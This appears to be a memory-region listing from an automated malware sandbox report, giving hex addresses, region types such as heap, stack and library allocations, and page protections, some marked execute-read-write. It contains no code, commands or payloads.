|
1FB6C660000
|
heap
|
page read and write
|
||
|
2C2E000
|
stack
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
7FF7C1450000
|
trusted library allocation
|
page read and write
|
||
|
27203AF3000
|
heap
|
page read and write
|
||
|
1FC202FD000
|
heap
|
page read and write
|
||
|
227D5000
|
unclassified section
|
page execute and read and write
|
||
|
6174000
|
heap
|
page read and write
|
||
|
7FF7C1530000
|
trusted library allocation
|
page read and write
|
||
|
2AC0000
|
remote allocation
|
page read and write
|
||
|
2D10000
|
unclassified section
|
page readonly
|
||
|
7173000
|
heap
|
page read and write
|
||
|
2AB2000
|
heap
|
page read and write
|
||
|
238B000
|
stack
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
7FB4000
|
heap
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
37EE000
|
stack
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page read and write
|
||
|
1FC07A30000
|
trusted library allocation
|
page read and write
|
||
|
60D5AFC000
|
stack
|
page read and write
|
||
|
1E63A59D000
|
heap
|
page read and write
|
||
|
1E63F2B0000
|
trusted library allocation
|
page read and write
|
||
|
45F2000
|
trusted library allocation
|
page read and write
|
||
|
217DD000
|
stack
|
page read and write
|
||
|
27203649000
|
heap
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
1FC20127000
|
heap
|
page execute and read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
2B56000
|
heap
|
page read and write
|
||
|
3634000
|
heap
|
page read and write
|
||
|
1E639EAC000
|
heap
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F7C000
|
stack
|
page read and write
|
||
|
27203B0C000
|
heap
|
page read and write
|
||
|
FFFBDFF000
|
stack
|
page read and write
|
||
|
8FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C1430000
|
trusted library allocation
|
page read and write
|
||
|
9090000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC1FF94000
|
heap
|
page read and write
|
||
|
88FE000
|
stack
|
page read and write
|
||
|
798E000
|
stack
|
page read and write
|
||
|
1FC20190000
|
heap
|
page read and write
|
||
|
2B1D000
|
heap
|
page read and write
|
||
|
21DC0000
|
unclassified section
|
page execute and read and write
|
||
|
1E63F190000
|
trusted library allocation
|
page read and write
|
||
|
1E63B150000
|
trusted library allocation
|
page read and write
|
||
|
21CF0000
|
unclassified section
|
page execute and read and write
|
||
|
22F30000
|
unclassified section
|
page execute and read and write
|
||
|
1E63A55C000
|
heap
|
page read and write
|
||
|
1FC17B41000
|
trusted library allocation
|
page read and write
|
||
|
374E000
|
stack
|
page read and write
|
||
|
794E000
|
stack
|
page read and write
|
||
|
2BA9000
|
trusted library allocation
|
page read and write
|
||
|
5190000
|
heap
|
page execute and read and write
|
||
|
85B0000
|
direct allocation
|
page read and write
|
||
|
60D59FE000
|
stack
|
page read and write
|
||
|
B32EE7E000
|
stack
|
page read and write
|
||
|
27203640000
|
heap
|
page read and write
|
||
|
D3D56FF000
|
stack
|
page read and write
|
||
|
347F000
|
unkown
|
page read and write
|
||
|
22946000
|
unclassified section
|
page execute and read and write
|
||
|
333E000
|
stack
|
page read and write
|
||
|
27201C0C000
|
heap
|
page read and write
|
||
|
2310000
|
unclassified section
|
page readonly
|
||
|
2B17000
|
heap
|
page read and write
|
||
|
27201BAA000
|
heap
|
page read and write
|
||
|
2B80000
|
trusted library allocation
|
page read and write
|
||
|
2B0C000
|
heap
|
page read and write
|
||
|
8A0E000
|
heap
|
page read and write
|
||
|
1FC202E5000
|
heap
|
page read and write
|
||
|
7FF7C14A0000
|
trusted library allocation
|
page read and write
|
||
|
FFFC3FC000
|
stack
|
page read and write
|
||
|
1FC06395000
|
heap
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
1E63ADB0000
|
trusted library section
|
page readonly
|
||
|
54C1000
|
heap
|
page read and write
|
||
|
B32EAFE000
|
unkown
|
page readonly
|
||
|
2B42000
|
heap
|
page read and write
|
||
|
1E639E3F000
|
heap
|
page read and write
|
||
|
B32E9FE000
|
unkown
|
page readonly
|
||
|
8550000
|
trusted library allocation
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
60C0000
|
heap
|
page read and write
|
||
|
7FF7C1210000
|
trusted library allocation
|
page read and write
|
||
|
1E63F160000
|
trusted library allocation
|
page read and write
|
||
|
8E1C000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
349D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF486A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2930000
|
heap
|
page read and write
|
||
|
27201C6E000
|
heap
|
page read and write
|
||
|
34D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
22856000
|
unclassified section
|
page execute and read and write
|
||
|
1FC20303000
|
heap
|
page read and write
|
||
|
9840000
|
direct allocation
|
page execute and read and write
|
||
|
85C0000
|
direct allocation
|
page read and write
|
||
|
21AFB000
|
stack
|
page read and write
|
||
|
2B41000
|
heap
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
22960000
|
unclassified section
|
page execute and read and write
|
||
|
8E30000
|
direct allocation
|
page execute and read and write
|
||
|
1E63A415000
|
heap
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page read and write
|
||
|
27AC000
|
stack
|
page read and write
|
||
|
1FC063B5000
|
heap
|
page read and write
|
||
|
2FB9000
|
stack
|
page read and write
|
||
|
1E63F257000
|
trusted library allocation
|
page read and write
|
||
|
7B42000
|
heap
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
60D5B7E000
|
stack
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
223C0000
|
heap
|
page read and write
|
||
|
4F4E000
|
stack
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
4E8E000
|
trusted library allocation
|
page read and write
|
||
|
27201BCA000
|
heap
|
page read and write
|
||
|
22AA0000
|
unclassified section
|
page execute and read and write
|
||
|
60D6B0F000
|
unkown
|
page read and write
|
||
|
3518000
|
trusted library allocation
|
page read and write
|
||
|
1FC201B0000
|
heap
|
page read and write
|
||
|
1E63F1E0000
|
trusted library allocation
|
page read and write
|
||
|
2B2E000
|
heap
|
page read and write
|
||
|
27203647000
|
heap
|
page read and write
|
||
|
6B60000
|
direct allocation
|
page read and write
|
||
|
1E639E76000
|
heap
|
page read and write
|
||
|
23142000
|
unclassified section
|
page execute and read and write
|
||
|
B71F000
|
direct allocation
|
page execute and read and write
|
||
|
29DE000
|
stack
|
page read and write
|
||
|
61A1000
|
trusted library allocation
|
page read and write
|
||
|
2848000
|
heap
|
page read and write
|
||
|
2B13000
|
heap
|
page read and write
|
||
|
1FC063B0000
|
heap
|
page read and write
|
||
|
2B14000
|
heap
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page read and write
|
||
|
1E639C00000
|
heap
|
page read and write
|
||
|
21250000
|
direct allocation
|
page read and write
|
||
|
2D20000
|
unclassified section
|
page readonly
|
||
|
31BC000
|
heap
|
page read and write
|
||
|
6161000
|
heap
|
page read and write
|
||
|
27201C69000
|
heap
|
page read and write
|
||
|
1E63A51A000
|
heap
|
page read and write
|
||
|
6AF0000
|
direct allocation
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
6BEA000
|
stack
|
page read and write
|
||
|
27201AD0000
|
heap
|
page read and write
|
||
|
5115000
|
heap
|
page execute and read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
88BA000
|
trusted library allocation
|
page read and write
|
||
|
21C3E000
|
stack
|
page read and write
|
||
|
6326000
|
unclassified section
|
page execute and read and write
|
||
|
2188E000
|
stack
|
page read and write
|
||
|
1FC079F0000
|
trusted library allocation
|
page read and write
|
||
|
228B5000
|
unclassified section
|
page execute and read and write
|
||
|
4F50000
|
heap
|
page read and write
|
||
|
615B000
|
heap
|
page read and write
|
||
|
5591000
|
trusted library allocation
|
page read and write
|
||
|
27201C27000
|
heap
|
page read and write
|
||
|
7E7B000
|
stack
|
page read and write
|
||
|
61B5000
|
heap
|
page read and write
|
||
|
1E63F44D000
|
heap
|
page read and write
|
||
|
1E63F1E0000
|
trusted library allocation
|
page read and write
|
||
|
27201E9B000
|
heap
|
page read and write
|
||
|
22EA0000
|
unclassified section
|
page execute and read and write
|
||
|
4D1B000
|
trusted library allocation
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
1E63F3F0000
|
trusted library allocation
|
page read and write
|
||
|
1E639F02000
|
heap
|
page read and write
|
There are 1163 hidden memdumps, click here to show them.